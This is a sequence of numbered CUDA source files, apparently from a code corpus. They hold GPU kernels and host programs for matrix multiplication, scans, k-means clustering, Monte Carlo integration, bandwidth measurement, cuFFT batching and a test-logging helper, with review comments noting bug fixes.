{
    *c = a + b;
}
21,447
#include <iostream>
using namespace std;

// Naive global-memory matrix multiply: C = A * B for width x width square
// matrices. Launch with 2D thread blocks; each thread computes one C[i][j].
__global__ void Mat_Mul_Global (float *A, float *B, float *C, int width)
{
    int i = blockIdx.y * blockDim.y + threadIdx.y;  // row
    int j = blockIdx.x * blockDim.x + threadIdx.x;  // column
    // Guard: the grid usually launches more threads than elements.
    if ((i < width) && (j < width)) {
        // Per-thread accumulator lives in a register; each thread owns
        // exactly one output element, so there is no data race.
        float value = 0.f;
        for (int k = 0; k < width; k++) {
            value += A[i*width + k] * B[k*width + j];
        }
        C[i*width + j] = value;
    }
}

int main()
{
    int n;
    cin >> n;
    int size = n*n*sizeof(float);

    // Host matrices: A = all ones, B = all twos, C zeroed.
    float *A = (float *) malloc( size );
    float *B = (float *) malloc( size );
    float *C = (float *) malloc( size );
    for (int i = 0; i < n; i++)
        for (int j = 0; j < n; j++) {
            int idx = i*n + j;
            A[idx] = 1.;
            B[idx] = 2.;
            C[idx] = 0.;
        }

    // Device matrices.
    float *d_A, *d_B, *d_C;
    cudaMalloc(&d_A, size);
    cudaMalloc(&d_B, size);
    cudaMalloc(&d_C, size);
    cudaMemcpy(d_A, A, size, cudaMemcpyHostToDevice);
    cudaMemcpy(d_B, B, size, cudaMemcpyHostToDevice);

    int block_width = 16;
    // BUG FIX: `ceil(n/block_width)` divided two ints first (flooring), so
    // any n not divisible by 16 lost its tail rows/columns. Use integer
    // ceiling division instead.
    int grid_width = (n + block_width - 1) / block_width;
    dim3 dim_grid(grid_width, grid_width);
    dim3 dim_block(block_width, block_width);   // 16*16 = 256 threads/block

    Mat_Mul_Global<<<dim_grid, dim_block>>> (d_A, d_B, d_C, n);

    // Blocking copy retrieves the result (and synchronizes).
    cudaMemcpy(C, d_C, size, cudaMemcpyDeviceToHost);

    for (int i = 0; i < n; i++)
        for (int j = 0; j < n; j++) {
            cout << i << " " << j << " " << C[i*n+j] << endl;
        }

    cudaFree(d_A);
    cudaFree(d_B);
    cudaFree(d_C);
    free(A);
    free(B);
    free(C);
}
21,448
#include "includes.h"

// Adds a per-block offset to an array of per-block inclusive scan results,
// turning them into a single global inclusive scan:
//   d_outVals[g] = d_inVals[g] + d_blockOffset[blockIdx]   (block 0 adds nothing)
// One thread per element; the guard handles the grid tail.
// NOTE(review): s_incScan is declared but never used, so any dynamic
// shared-memory size passed at launch appears unnecessary — confirm with callers.
__global__ void incSumScanB2_kernel(unsigned int* d_outVals, unsigned int* d_inVals, size_t numVals, unsigned int* d_blockOffset)
{
    // unsigned int tIdx = threadIdx.x;
    unsigned int gIdx = blockIdx.x * blockDim.x + threadIdx.x;  // global element index
    extern __shared__ unsigned int s_incScan[];  // unused — see note above

    if (gIdx >= numVals) return;  // tail guard

    d_outVals[gIdx] = ( blockIdx.x > 0) ? d_inVals[gIdx] + d_blockOffset[blockIdx.x]: d_inVals[gIdx];
}
21,449
#include <stdio.h>
#include <stdlib.h>

#define N (1024*1024)
#define M (1000000)

// Each thread writes buf[i] = i/N then iterates the logistic-style map
// x <- x*x - 0.25 for M steps on its own element. The global index i is
// unique per thread: 4096 blocks * 256 threads covers exactly N elements.
__global__ void cudakernel(float *buf)
{
    int i = threadIdx.x + blockIdx.x * blockDim.x;  // unique global index

    buf[i] = 1.0f * i / N;
    for (int j = 0; j < M; j++)
        buf[i] = buf[i] * buf[i] - 0.25f;
}

int main()
{
    // BUG FIX: N floats = 4 MB; as a plain local this overflowed the
    // default stack on many systems. Static storage avoids that.
    static float data[N];
    float *d_data;  // device pointer

    // allocate memory on GPU
    cudaMalloc((void**) &d_data, N*sizeof(float));

    // invoke kernel with 4096 blocks of 256 threads (4096*256 == N)
    cudakernel<<<4096, 256>>>(d_data);

    // copy results back to host (blocking, so no extra sync needed)
    cudaMemcpy(data, d_data, N*sizeof(float), cudaMemcpyDeviceToHost);
    cudaFree(d_data);

    int input;
    printf("Enter an index: ");
    // BUG FIX: the original never validated the scanf result or the index,
    // so bad input read out of bounds of data[].
    if (scanf("%d", &input) != 1 || input < 0 || input >= N) {
        fprintf(stderr, "invalid index\n");
        return 1;
    }
    printf("data[%d] = %f\n", input, data[input]);
    return 0;
}
21,450
// Adds 1.0f to each x/y/z component of one float3 element per thread.
__global__ void f1d3(float3 * __restrict__ ptr)
{
    float3 v = ptr[threadIdx.x];  // load the whole 12-byte element
    v.x += 1;
    v.y += 1;
    v.z += 1;
    ptr[threadIdx.x] = v;         // store it back as one struct
    return;
}

// __global__ void f1(float4 * __restrict__ ptr) {
//     float4 v = ptr[threadIdx.x];
//     v.x += 1;
//     v.y += 1;
//     v.z += 1;
//     v.w += 1;
//     ptr[threadIdx.x] = v;
//     return;
// }

// Host driver: zero-fills a device buffer of 32 float3 elements and runs
// f1d3 over it with one 32-thread block. (Results are never copied back;
// this looks like a load/store micro-benchmark skeleton.)
int main()
{
    // float4 *f1_ptr;
    // cudaMalloc(&f1_ptr, sizeof(float)*128);
    // cudaMemset(f1_ptr, 0, sizeof(float)*128);

    float3 *f1_ptr;
    // 96 floats = 32 threads * 3 components = exactly 32 float3 elements.
    cudaMalloc(&f1_ptr, sizeof(float)*96);
    cudaMemset(f1_ptr, 0, sizeof(float)*96);

    // global fuc
    // Timer t1, t2;
    // t1.Start();
    // f1<<<1,32>>>(f1_ptr);
    f1d3<<<1,32>>>(f1_ptr);
    // t1.Pause();
    // printf_timer(t1);

    cudaFree(f1_ptr);
    return 0;
}
21,451
#include "includes.h"

extern "C" {
}

// Element-wise vector addition: y[i] = x1[i] + x2[i] for every i in [0, len).
// One thread per element; the early-return guard handles grids that
// overshoot len.
__global__ void add(const float* x1, const float* x2, float* y, unsigned int len)
{
    const unsigned int idx = blockIdx.x * blockDim.x + threadIdx.x;
    if (idx >= len)
        return;  // past the end of the vectors — nothing to do
    y[idx] = x1[idx] + x2[idx];
}
21,452
#include <float.h>

// Squared Euclidean distance between item itemId and center centerId.
// Both arrays are indexed row-major as [id * paramsCount + param].
__device__ float euclid2( float* items, float* centers, int itemId, int centerId, int paramsCount)
{
    float sum = 0.0;
    for(int j = 0; j < paramsCount; j++) {
        sum = sum + (items[itemId * paramsCount + j] - centers[centerId * paramsCount + j]) * (items[itemId * paramsCount + j] - centers[centerId * paramsCount + j]);
    }
    return sum;
}

// k-means assignment step: each thread takes one item, finds the nearest
// center (squared Euclidean distance) and writes its index to clustersIds.
// Requires clustersCount * paramsCount floats of dynamic shared memory.
__global__ void clusreringKernel( float* items, float* deviceCenters, int* clustersIds, int itemsCount, int clustersCount, int paramsCount)
{
    extern __shared__ float centers[];  // block-local copy of all centers

    // Cooperative copy of the centers into shared memory. The i/j loop
    // visits every linear index clustersCount*j + i exactly once, so this
    // is a full element-for-element copy (just iterated in strides).
    for (int i = threadIdx.x; i < clustersCount; i += blockDim.x) {
        for (int j = 0; j < paramsCount; j++) {
            centers[clustersCount * j + i] = deviceCenters[clustersCount * j + i];
        }
    }
    __syncthreads();  // all centers must be loaded before any thread reads them

    int itemId = blockDim.x * blockIdx.x + threadIdx.x;
    if(itemId < itemsCount) {
        float minDistance = FLT_MAX;
        float distance;
        // NOTE(review): index stays uninitialized if clustersCount == 0 or
        // every distance compares as NaN — confirm callers guarantee neither.
        int index;
        for(int i = 0; i < clustersCount; i++) {
            distance = euclid2(items, centers, itemId, i, paramsCount);
            if(minDistance >= distance) {
                minDistance = distance;
                index = i;
            }
        }
        clustersIds[itemId] = index;
    }
}

// k-means update step: one block per cluster, one thread per parameter.
// Sums the coordinates of every item assigned to the block's cluster and
// counts the members. Requires paramsCount floats of dynamic shared memory.
__global__ void newCentersKernel( float* items, int* clustersIds, float* newCenters, int* itemsPerClusters, int itemsCount, int clustersCount, int paramsCount )
{
    extern __shared__ float center[];  // one accumulator slot per parameter
    int clusterId = blockIdx.x;        // block -> cluster
    int paramId = threadIdx.x;         // thread -> parameter

    center[paramId] = 0.0;
    int count = 0;
    __syncthreads();

    // Each thread only ever touches center[paramId], so there is no
    // cross-thread race on the shared accumulator.
    for(int i = 0; i < itemsCount; i++) {
        if(clusterId == clustersIds[i]) {
            center[paramId] += items[i * paramsCount + paramId];
            count += 1;
        }
    }
    newCenters[clusterId * paramsCount + paramId] = center[paramId];
    // Every thread in the block computes the same count and stores the
    // same value here (redundant but harmless).
    itemsPerClusters[clusterId] = count;
}
21,453
#include <stdio.h>
#include <assert.h>
#include <curand.h>
#include <curand_kernel.h>
#include <cuda_runtime.h>
#include <unistd.h>
#include <math.h>

#define SIZE 3
#define BLOCKSIZE 512
#define PI 3.1415926535897932384626433

// Sanity hook so callers can check the library loaded (message is Portuguese:
// "hi, I was imported successfully").
extern "C" void hello_world(){
    printf("oi, fui importada com sucesso. \n");
}

// Fills the device buffer dV with `size` uniform [0,1) floats using a
// fixed-seed (1337) XORWOW generator, so runs are reproducible.
// NOTE(review): the generator is never destroyed (curandDestroyGenerator)
// — a leak if called repeatedly.
extern "C" void randomize(float *dV, int size){
    curandGenerator_t prng;
    /* create generator */
    curandCreateGenerator(&prng, CURAND_RNG_PSEUDO_XORWOW);
    /* fixed seed for reproducibility */
    curandSetPseudoRandomGeneratorSeed(prng, (unsigned long long) 1337);
    /* fill dV with uniform samples */
    curandGenerateUniform(prng, dV, size);
}

// In place: dV[i] <- f(dV[i]) = sin((2M+1)*pi*x)*cos(2*pi*k*x)/sin(pi*x),
// and dV2[i] <- f(x)^2 (used later for the second moment).
// NOTE(review): sin/cos here are the double-precision overloads applied to
// float data — presumably acceptable accuracy-wise, but slower than sinf/cosf.
extern "C" __global__ void applyfunction(float *dV, float *dV2, int size, float k, float M){
    int i = blockIdx.x*blockDim.x + threadIdx.x;
    if (i < size){
        dV[i] = ((float)sin((2*M + 1)*PI*dV[i])*cos(2*PI*k*dV[i]))/sin(PI*dV[i]);
        dV2[i] = dV[i]*dV[i];
    }
}

// One round of block-wise tree reduction: each block sums its BLOCKSIZE
// slice of idata into shared memory and writes the partial sum back to
// idata[blockIdx.x]. The caller loops until a single value remains.
// Assumes blockDim.x is a power of two (BLOCKSIZE = 512).
// NOTE(review): idata[i] is dereferenced even when i >= size — the
// pseudoIf multiplier zeroes the value but does NOT prevent the
// out-of-bounds load; confirm the buffer is padded or fix the guard.
extern "C" __global__ void sumvec(float *idata, int size){
    __shared__ float sdata[BLOCKSIZE];
    int s;
    int tid = threadIdx.x;
    int i = blockIdx.x*blockDim.x + threadIdx.x;
    int pseudoIf = i < size;  // 1 inside the array, 0 past the end
    /* if (blockIdx.x == 1 && threadIdx.x == 0){ printf("i = %d; size = %d; pseudoIf = %d\n", i, size, pseudoIf); }*/
    sdata[tid] = pseudoIf*idata[i];
    /* __syncthreads(); if (tid == 0){ for (s = 0; s < size; s++){ printf("id = %d sdata[%d] = %f; %f\n", blockIdx.x, s, sdata[s], idata[blockIdx.x*blockDim.x + s]); } }*/
    __syncthreads();  // slice fully staged in shared memory
    // Halving-stride tree reduction; barrier is outside the divergent if,
    // so every thread reaches it.
    for (s = blockDim.x/2; s > 0; s >>= 1){
        if (tid < s){
            sdata[tid] = sdata[tid] + sdata[tid+s];
        }
        __syncthreads();
    }
    if (tid == 0){
        printf("id = %d, stored = %f\n", blockIdx.x, sdata[0]);
        idata[blockIdx.x] = sdata[0];  // partial sum for the next round
    }
}

// Monte-Carlo estimate: draws N uniform samples, applies `applyfunction`,
// reduces both f and f^2 on the GPU, and returns {mean(f), mean(f^2)} as a
// pointer to a static 2-element buffer (NOT thread-safe; each call
// overwrites the previous result).
extern "C" float* MC_CUDA(int N, float k, float M){
    int i, devID = 0;
    float *dV, *dV2, f, f2;
    cudaError_t error;
    cudaDeviceProp deviceProp;
    static float resultados[2];  // returned to the caller — static lifetime

    /* CUDA device selection / capability report */
    error = cudaGetDevice(&devID);
    if (error != cudaSuccess){
        printf("cudaGetDevice returned error %s (code %d), line(%d)\n", cudaGetErrorString(error), error, __LINE__);
    }
    error = cudaGetDeviceProperties(&deviceProp,devID);
    if (deviceProp.computeMode == cudaComputeModeProhibited){
        fprintf(stderr, "Error: device is running in <Compute Mode Prohibited>, no threads can use ::cudaSetDevice().\n");
        exit(EXIT_SUCCESS);
    }
    if (error != cudaSuccess){
        printf("cudaGetDeviceProperties returned error %s (code %d), line(%d)\n", cudaGetErrorString(error), error, __LINE__);
    }
    else{
        printf("GPU Device %d: \"%s\" with compute capability %d.%d\n\n", devID, deviceProp.name, deviceProp.major, deviceProp.minor);
    }

    /* Allocate array on device */
    error = cudaMalloc(&dV, sizeof(float)*N);
    if (error != cudaSuccess){
        printf("cudaMalloc returned error %s (code %d), line(%d) \n", cudaGetErrorString(error), error, __LINE__);
    }
    error = cudaMalloc(&dV2, sizeof(float)*N);
    if (error != cudaSuccess){
        printf("cudaMalloc returned error %s (code %d), line(%d) \n", cudaGetErrorString(error), error, __LINE__);
    }

    /* Generate array */
    randomize(dV, N);

    /* Apply function */
    applyfunction<<<(1 + (N/BLOCKSIZE)), BLOCKSIZE>>>(dV, dV2, N, k, M);

    /* Sum all values: repeated block reductions shrink the live prefix of
       each array from i elements to 1+(i/BLOCKSIZE) partial sums per pass,
       until a single total remains in element 0. */
    for (i = N; i > 1; i = 1+(i/BLOCKSIZE)){
        printf("Number of blocks = %d\n", 1+(i/BLOCKSIZE));
        printf("Size of array = %d\n", i);
        sumvec<<<(1+(i/BLOCKSIZE)), BLOCKSIZE>>>(dV, i);
        error = cudaDeviceSynchronize();
        if (error != cudaSuccess){
            printf("cudaDeviceSynchronize returned error %s (code %d), line(%d) \n", cudaGetErrorString(error), error, __LINE__);
        }
        printf("WAIT!\n");
        sumvec<<<(1+(i/BLOCKSIZE)), BLOCKSIZE>>>(dV2, i);
        error = cudaDeviceSynchronize();
        if (error != cudaSuccess){
            printf("cudaDeviceSynchronize returned error %s (code %d), line(%d) \n", cudaGetErrorString(error), error, __LINE__);
        }
    }

    /* Copy the two totals (first element of each array) from device */
    error = cudaMemcpy(&f, &dV[0], sizeof(float), cudaMemcpyDeviceToHost);
    if (error != cudaSuccess){
        printf("cudaMemcpy returned error %s (code %d), line(%d) \n", cudaGetErrorString(error), error, __LINE__);
    }
    error = cudaMemcpy(&f2, &dV2[0], sizeof(float), cudaMemcpyDeviceToHost);
    if (error != cudaSuccess){
        printf("cudaMemcpy returned error %s (code %d), line(%d) \n", cudaGetErrorString(error), error, __LINE__);
    }

    /* Calculate results: sums -> means */
    printf("SOMA = %f\n", f);
    f /= N;
    f2 /= N;
    resultados[0] = f;
    resultados[1] = f2;
    cudaFree(dV);
    cudaFree(dV2);
    return resultados;
}
21,454
// Includes, System
#include <iostream>
#include <assert.h>
#include <chrono>

// Here you can set the device ID that was assigned to you
#define MYDEVICE 0 // 24%8=0

// Simple utility function to check for CUDA runtime errors
void checkCUDAError(const char *msg);

///////////////////////////////////////////////////////////////////////////////
// Measures H2D / D2D / D2H copy bandwidth for a dimA-element float buffer
// (dimA from argv[1], default 8) and verifies the round-tripped data.
///////////////////////////////////////////////////////////////////////////////
int main(int argc, char* argv[])
{
    cudaSetDevice(MYDEVICE);

    // element count for the host/device buffers
    int const dimA = (argc > 1) ? std::atoi(argv[1]) : 8;
    std::cout << "dimA " << dimA << std::endl;

    float *h_a;        // pinned host buffer
    float *d_a, *d_b;  // device buffers

    // Pinned (page-locked) host memory: same syntax as cudaMalloc, enables
    // asynchronous copies and higher transfer bandwidth than malloc.
    size_t memSize = dimA*sizeof(*h_a);
    cudaMallocHost( &h_a, memSize );
    for (int i = 0; i<dimA; ++i)
        h_a[i] = i;

    cudaMalloc( &d_a, memSize );
    cudaMalloc( &d_b, memSize );

    // host to device memory copy
    {
        auto start = std::chrono::system_clock::now();
        cudaMemcpy( d_a, h_a, memSize, cudaMemcpyHostToDevice );  // blocking
        auto stop = std::chrono::system_clock::now();
        std::chrono::duration<double> dur = stop - start;
        // BUG FIX: GB/s is bytes / 1e9 / seconds. The original divided by
        // 8e9 (a bits-vs-bytes mixup), under-reporting bandwidth 8x, and
        // left an unused `band` local behind.
        printf ("h2d : PCI bandwidth %.1f GB/seconds \n", double(memSize)/1.0e9/dur.count());
    }

    // device to device memory copy
    {
        auto start = std::chrono::system_clock::now();
        cudaMemcpy( d_b, d_a, memSize, cudaMemcpyDeviceToDevice );
        // BUG FIX: a device-to-device cudaMemcpy may return before the copy
        // completes, so synchronize before reading the clock.
        cudaDeviceSynchronize();
        auto stop = std::chrono::system_clock::now();
        std::chrono::duration<double> dur = stop - start;
        printf ("d2d : PCI bandwidth %.1f GB/seconds \n", double(memSize)/1.0e9/dur.count());
    }

    // clear host memory so the final check proves the D2H copy worked
    for (int i=0; i<dimA; ++i )
        h_a[i] = 0.f;

    // device to host copy
    {
        auto start = std::chrono::system_clock::now();
        cudaMemcpy( h_a, d_a, memSize, cudaMemcpyDeviceToHost );  // blocking
        auto stop = std::chrono::system_clock::now();
        std::chrono::duration<double> dur = stop - start;
        printf ("d2h : PCI bandwidth %.1f GB/seconds \n", double(memSize)/1.0e9/dur.count());
    }

    // Check for any CUDA errors
    checkCUDAError("cudaMemcpy calls");

    // verify the data on the host is correct
    for (int i=0; i<dimA; ++i)
        assert(h_a[i] == (float) i);

    // free device memory
    cudaFree( d_a );
    cudaFree( d_b );

    // Check for any CUDA errors
    checkCUDAError("cudaFree");

    // pinned memory must be released with cudaFreeHost, not free()
    cudaFreeHost(h_a);

    std::cout << "Correct!" << std::endl;
    return 0;
}

// Prints the last CUDA error (if any) tagged with msg and exits.
void checkCUDAError(const char *msg)
{
    cudaError_t err = cudaGetLastError();
    if( cudaSuccess != err) {
        std::cerr << "Cuda error: " << msg << " " << cudaGetErrorString(err) << std::endl;
        exit(-1);
    }
}
21,455
//3D vector class, floating point precision
#include <iostream>
#include <cmath>

using namespace std;

// Simple host/device 3D float vector with the usual algebra:
// add/sub/scale, dot and cross products, magnitude and normalization.
// All float arithmetic; fixed to use sqrtf and float literals so device
// code does not silently promote to double (slow on consumer GPUs).
class Vec
{
public:
    float x,y,z;

    __device__ __host__ Vec() { x=0; y=0; z=0; }

    __device__ __host__ Vec(float x, float y, float z)
    {
        this->x = x;
        this->y = y;
        this->z = z;
    }

    // Returns this + v (does not modify *this).
    __device__ __host__ Vec add(const Vec v)
    {
        return Vec(x + v.x, y + v.y, z + v.z);
    }

    // In-place increment: *this += v.
    void __device__ __host__ addTo(const Vec v)
    {
        x += v.x;
        y += v.y;
        z += v.z;
    }

    // Returns this - v.
    __device__ __host__ Vec sub(const Vec v)
    {
        return Vec(x - v.x, y - v.y, z - v.z);
    }

    // Returns this scaled by a.
    __device__ __host__ Vec times(float a)
    {
        return Vec(x*a, y*a, z*a);
    }

    // Dot product.
    __device__ __host__ float dot(const Vec u)
    {
        return x*u.x + y*u.y + z*u.z;
    }

    // Euclidean length. BUG FIX: was sqrt() (double) on a float value.
    __device__ __host__ float mag()
    {
        return sqrtf(squared());
    }

    // Cross product (right-handed).
    __device__ __host__ Vec cross(const Vec b)
    {
        float outx = y*b.z - z*b.y;
        float outy = z*b.x - x*b.z;
        float outz = x*b.y - y*b.x;
        return Vec(outx, outy, outz);
    }

    // Squared length (avoids the sqrt when only comparisons are needed).
    __device__ __host__ float squared()
    {
        return x*x + y*y + z*z;
    }

    // Value copy.
    __device__ __host__ Vec copy()
    {
        return Vec(x, y, z);
    }

    // Unit vector in this direction. BUG FIX: was 1.0/mag() (double
    // division); undefined for the zero vector, as before.
    __device__ __host__ Vec unit()
    {
        return times(1.0f/mag());
    }

    // Host-only debug print: "x,y,z".
    void print()
    {
        cout << x << "," << y << "," << z << endl;
    }
};
21,456
#include "includes.h"

const int nblock = 32;

//////////////////////////////////////////////////////////////////////////////
// Computes, for every pair of filters (tid1, tid2) handled by this block
// pair, the full temporal cross-correlation (2*nt0-1 lags) of their
// waveforms W1 and W2, scaled by the spatial overlap UtU:
//   WtW[tid1, tid2, i] = (sum_t W1[t, tid1] * W2[t - lag, tid2]) * UtU[tid1, tid2]
// Params[1] = Nfilt (number of filters), Params[9] = nt0 (waveform length).
// Launch geometry (from the indexing): nblock x nblock threads per block;
// blockIdx.x selects the W1 tile, blockIdx.y the W2 tile.
// Shared arrays are sized nblock*81, so nt0 must be <= 81 or the staging
// loops overrun them — presumably guaranteed by the caller; verify.
//////////////////////////////////////////////////////////////////////////////
__global__ void crossFilter(const double *Params, const float *W1, const float *W2, const float *UtU, float *WtW){
    __shared__ float shW1[nblock*81], shW2[nblock*81];
    float x;
    int nt0, tidx, tidy , bidx, bidy, i, Nfilt, t, tid1, tid2;

    tidx = threadIdx.x;
    tidy = threadIdx.y;
    bidx = blockIdx.x;
    bidy = blockIdx.y;

    Nfilt = (int) Params[1];
    nt0 = (int) Params[9];

    tid1 = tidx + bidx*nblock;  // global filter index on the W1 side
    // Stage this block's W1 waveforms: note tid2 here uses bidx, because
    // the W1 tile is selected by blockIdx.x.
    tid2 = tidy + bidx*nblock;
    if (tid2<Nfilt){
        while(tidx<nt0){
            shW1[tidx + tidy * nt0] = W1[tidx + tid2 * nt0];
            tidx+= nblock;  // strided cooperative copy over time samples
        }
    }
    tidx = threadIdx.x;  // reset after being consumed as a loop counter
    // Stage the W2 tile selected by blockIdx.y; tid2 keeps this value for
    // the compute phase below.
    tid2 = tidy + bidy*nblock;
    if (tid2<Nfilt){
        while(tidx<nt0){
            shW2[tidx + tidy * nt0] = W2[tidx + tid2 * nt0];
            tidx+= nblock;
        }
    }
    tidx = threadIdx.x;
    __syncthreads();  // both tiles fully staged before any correlation reads

    if (tid2<Nfilt && tid1<Nfilt){
        // One output per lag i in [0, 2*nt0-1); the two branches clip the
        // summation window to the valid overlap of the two waveforms.
        for(i=0;i<2*nt0-1;i++){
            x = 0.0f;
            if(i<nt0)
                for(t=0;t<i+1;t++)
                    x += shW1[t + nt0 * tidx] * shW2[t + (nt0-i-1) + nt0 * tidy];
            else
                for(t=i-nt0+1;t<nt0;t++)
                    x += shW1[t + nt0 * tidx] * shW2[t + (nt0-i-1) + nt0 * tidy];
            WtW[tid1 + tid2*Nfilt + i*Nfilt*Nfilt] = x * UtU[tid1 + tid2*Nfilt];
        }
    }
}
21,457
#include "includes.h"

// Second CUDA program
// Ping-Che Chen

#define BLOCK_SIZE 16

// Tiled matrix multiply C = A * B using shared-memory tiles and Kahan
// (compensated) summation to reduce floating-point accumulation error.
// lda/ldb/ldc are row strides (leading dimensions) of the three matrices.
// Launch geometry: BLOCK_SIZE x BLOCK_SIZE threads per block, one output
// element per thread.
// NOTE(review): there are no bounds checks, so n and the grid dimensions
// are presumably exact multiples of BLOCK_SIZE and the grid exactly covers
// the matrices — confirm with the launcher.
__global__ static void matMultCUDA(const float* a, size_t lda, const float* b, size_t ldb, float* c, size_t ldc, int n)
{
    __shared__ float matA[BLOCK_SIZE][BLOCK_SIZE];
    __shared__ float matB[BLOCK_SIZE][BLOCK_SIZE];
    const int tidc = threadIdx.x;               // column within the tile
    const int tidr = threadIdx.y;               // row within the tile
    const int bidc = blockIdx.x * BLOCK_SIZE;   // tile's column origin in C
    const int bidr = blockIdx.y * BLOCK_SIZE;   // tile's row origin in C
    int i, j;
    float results = 0;  // running Kahan sum
    float comp = 0;     // Kahan compensation term
    // March the two tiles along the shared dimension.
    for(j = 0; j < n; j += BLOCK_SIZE) {
        matA[tidr][tidc] = a[(tidr + bidr) * lda + tidc + j];
        matB[tidr][tidc] = b[(tidr + j) * ldb + tidc + bidc];
        __syncthreads();  // tiles fully loaded before use
        for(i = 0; i < BLOCK_SIZE; i++) {
            // Kahan step: comp carries the low-order bits lost when the
            // product is folded into results. The exact statement order
            // is what makes the compensation work — do not "simplify".
            float t;
            comp -= matA[tidr][i] * matB[i][tidc];
            t = results - comp;
            comp = (t - results) + comp;
            results = t;
        }
        __syncthreads();  // all reads done before the tiles are overwritten
    }
    c[(tidr + bidr) * ldc + tidc + bidc] = results;
}
21,458
// CUDA code : Add two float vectors together
// Device code ( taken form Cuda SDK )
#include <iostream>

// Kernel: one thread per element, with a tail guard so the grid may
// overshoot N safely.
__global__ void VecAdd(const float* A, const float* B, float* C, int N)
{
    const int idx = blockIdx.x * blockDim.x + threadIdx.x;
    if (idx < N)
        C[idx] = A[idx] + B[idx];
}

// C interface wrapper - A B C are cudaMalloc'ed references
extern "C" void vecAdd( const float* A, const float* B, float* C, int size )
{
    const int threadsPerBlock = 256;
    // ceil-div: enough blocks to cover every element of the vectors
    const int blocksPerGrid = (size + threadsPerBlock - 1) / threadsPerBlock;
    VecAdd<<<blocksPerGrid, threadsPerBlock>>>(A, B, C, size);
}
21,459
#include <cuda.h>
#include <cufft.h>
#include <stdio.h>
#include <stdlib.h>
#include <math.h>

#define DATASIZE 32768
#define BATCH 16384

/********************/
/* CUDA ERROR CHECK */
/********************/
#define gpuErrchk(ans) { gpuAssert((ans), __FILE__, __LINE__); }
inline void gpuAssert(cudaError_t code, const char *file, int line, bool abort=true)
{
    if (code != cudaSuccess)
    {
        fprintf(stderr,"GPUassert: %s %s %d\n", cudaGetErrorString(code), file, line);
        if (abort) exit(code);
    }
}

/*********************/
/* CUFFT ERROR CHECK */
/*********************/
// cufftResult is a distinct enum from cudaError_t, so it needs its own check.
#define cufftErrchk(ans) { cufftAssert((ans), __FILE__, __LINE__); }
inline void cufftAssert(cufftResult code, const char *file, int line)
{
    if (code != CUFFT_SUCCESS)
    {
        fprintf(stderr, "CUFFTassert: error %d %s %d\n", (int)code, file, line);
        exit((int)code);
    }
}

/********/
/* MAIN */
/********/
// Runs BATCH independent real-to-complex 1D FFTs of length DATASIZE using
// a single batched cuFFT plan.
int main ()
{
    // --- Host side input data allocation and initialization
    cufftReal *hostInputData = (cufftReal*)malloc(DATASIZE*BATCH*sizeof(cufftReal));
    if (hostInputData == NULL) { fprintf(stderr, "host malloc failed\n"); exit(1); }
    for (int i=0; i<BATCH; i++)
        for (int j=0; j<DATASIZE; j++)
            hostInputData[i*DATASIZE + j] = (cufftReal)(i + 1);  // constant per batch

    // --- Device side input data allocation and initialization
    cufftReal *deviceInputData;
    gpuErrchk(cudaMalloc((void**)&deviceInputData, DATASIZE * BATCH * sizeof(cufftReal)));
    // BUG FIX: this copy was unchecked in the original
    gpuErrchk(cudaMemcpy(deviceInputData, hostInputData, DATASIZE * BATCH * sizeof(cufftReal), cudaMemcpyHostToDevice));

    // --- Host side output data allocation (R2C output has DATASIZE/2+1 bins)
    cufftComplex *hostOutputData = (cufftComplex*)malloc((DATASIZE / 2 + 1) * BATCH * sizeof(cufftComplex));
    if (hostOutputData == NULL) { fprintf(stderr, "host malloc failed\n"); exit(1); }

    // --- Device side output data allocation
    cufftComplex *deviceOutputData;
    gpuErrchk(cudaMalloc((void**)&deviceOutputData, (DATASIZE / 2 + 1) * BATCH * sizeof(cufftComplex)));

    // --- Batched 1D FFTs
    cufftHandle handle;
    int rank = 1;                       // --- 1D FFTs
    int n[] = { DATASIZE };             // --- Size of the Fourier transform
    int istride = 1, ostride = 1;       // --- Distance between two successive input/output elements
    int idist = DATASIZE, odist = (DATASIZE / 2 + 1); // --- Distance between batches
    int inembed[] = { 0 };              // --- Input size with pitch (ignored for 1D transforms)
    int onembed[] = { 0 };              // --- Output size with pitch (ignored for 1D transforms)
    int batch = BATCH;                  // --- Number of batched executions
    // BUG FIX: cuFFT calls were unchecked; a failed plan made the exec
    // call fail silently.
    cufftErrchk(cufftPlanMany(&handle, rank, n, inembed, istride, idist, onembed, ostride, odist, CUFFT_R2C, batch));
    //cufftPlan1d(&handle, DATASIZE, CUFFT_R2C, BATCH);

    cufftErrchk(cufftExecR2C(handle, deviceInputData, deviceOutputData));

    // --- Device->Host copy of the results
    gpuErrchk(cudaMemcpy(hostOutputData, deviceOutputData, (DATASIZE / 2 + 1) * BATCH * sizeof(cufftComplex), cudaMemcpyDeviceToHost));

    /*for (int i=0; i<BATCH; i++) for (int j=0; j<(DATASIZE / 2 + 1); j++) printf("%i %i %f %f\n", i, j, hostOutputData[i*(DATASIZE / 2 + 1) + j].x, hostOutputData[i*(DATASIZE / 2 + 1) + j].y); */

    printf("Done!\n");

    cufftDestroy(handle);
    gpuErrchk(cudaFree(deviceOutputData));
    gpuErrchk(cudaFree(deviceInputData));
    // BUG FIX: both host buffers were leaked in the original
    free(hostInputData);
    free(hostOutputData);
}
21,460
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>

// Reliability-test logging helper: writes timestamped #HEADER/#IT/#SDC/#END
// records to a log file, feeds a file-based software watchdog, and aborts
// the test when error counts look pathological. Single-threaded use only —
// all state lives in the globals below.

// Location of timetamp file for software watchdog
char timestamp_watchdog[200] = "/home/carol/watchdog/timestamp.txt";

// Max errors that can be found for a single iteration
// If more than max errors is found, exit the program
unsigned long int max_errors_per_iter = 5000;

// Absolute path for log file, if needed
char absolute_path[200] = "/home/carol/logs/";

// Used to print the log only for some iterations, equal 1 means print every iteration
int iter_interval_print = 1;

char log_file_name[200] = "";
char full_log_file_name[300] = "";

// Saves the last amount of error found for a specific iteration
unsigned long int last_iter_errors = 0;
// Saves the last iteration index that had an error
unsigned long int last_iter_with_errors = 0;

unsigned long int kernels_total_errors = 0;
unsigned long int iteration_number = 0;
double kernel_time_acc = 0;
double kernel_time = 0;
long long it_time_start;

// ~ ===========================================================================
// Wall-clock time in microseconds since the epoch.
inline long long get_time() {
    struct timeval tv;
    gettimeofday(&tv, NULL);
    return (tv.tv_sec * 1000000) + tv.tv_usec;
};

// ~ ===========================================================================
// Override the per-iteration error threshold; returns the value now in effect.
unsigned long int set_max_errors_iter(unsigned long int max_errors){
    max_errors_per_iter = max_errors;
    return max_errors_per_iter;
};

